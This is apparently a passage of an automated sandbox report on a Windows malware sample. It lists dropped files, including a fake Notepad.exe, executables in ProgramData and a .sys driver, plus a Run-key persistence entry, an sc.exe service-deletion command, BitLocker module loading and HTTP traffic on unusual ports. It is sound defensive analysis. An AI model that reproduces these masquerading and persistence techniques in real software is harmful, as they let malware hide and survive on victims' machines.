Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI77162\_bz2.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI70442\_wmi.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76522\_ctypes.pyd Jump to dropped file
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe File created: C:\Windows\Temp\trxhxvjzqipl.sys Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80002\select.pyd Jump to dropped file
Source: C:\Users\user\Desktop\Setup.exe File created: C:\Users\user\AppData\Local\Temp\fix.exe Jump to dropped file
Source: C:\Users\user\Desktop\Setup.exe File created: C:\Users\user\AppData\Local\Temp\etc test.exe Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI77162\_decimal.pyd Jump to dropped file
Source: C:\Users\user\Desktop\Setup.exe File created: C:\Users\user\AppData\Local\Temp\hamburger.exe Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80002\_bz2.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80002\python312.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI70442\libffi-8.dll Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76522\python312.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI70442\python312.dll Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI77162\libcrypto-3.dll Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80002\_wmi.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76522\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI70442\_decimal.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\Notepad.exe Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI77162\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76522\libcrypto-3.dll Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76522\VCRUNTIME140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI70442\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76522\select.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI77162\_socket.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI77162\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76522\_decimal.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI70442\VCRUNTIME140.dll Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI77162\python312.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe File created: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI70442\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76522\_lzma.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76522\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\etc test.exe File created: C:\ProgramData\rstywrmdprzs\esfowblknspo.exe Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80002\VCRUNTIME140.dll Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI77162\_wmi.pyd Jump to dropped file
Source: C:\Users\user\Desktop\Setup.exe File created: C:\Users\user\AppData\Local\Temp\Notepad.exe Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80002\_lzma.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI70442\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76522\_bz2.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76522\libffi-8.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI70442\libcrypto-3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe File created: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\etc test.exe File created: C:\ProgramData\rstywrmdprzs\esfowblknspo.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\Notepad.exe Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe File created: C:\Windows\Temp\trxhxvjzqipl.sys Jump to dropped file

Boot Survival
barindex
Drops PE files to the user root directory
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\Notepad.exe Jump to dropped file
Source: C:\Users\user\Notepad.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update64
Source: C:\Users\user\Notepad.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update64
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "OBKZWAPS"

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 51523
Source: unknown Network traffic detected: HTTP traffic on port 51523 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 51523
Source: unknown Network traffic detected: HTTP traffic on port 51523 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 51523 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 51523
Source: unknown Network traffic detected: HTTP traffic on port 51523 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 51523 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 51523
Source: unknown Network traffic detected: HTTP traffic on port 51523 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 51523 -> 49743
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F04F51E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 6_2_00007FF7F04F51E0
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\fix.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\fix.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
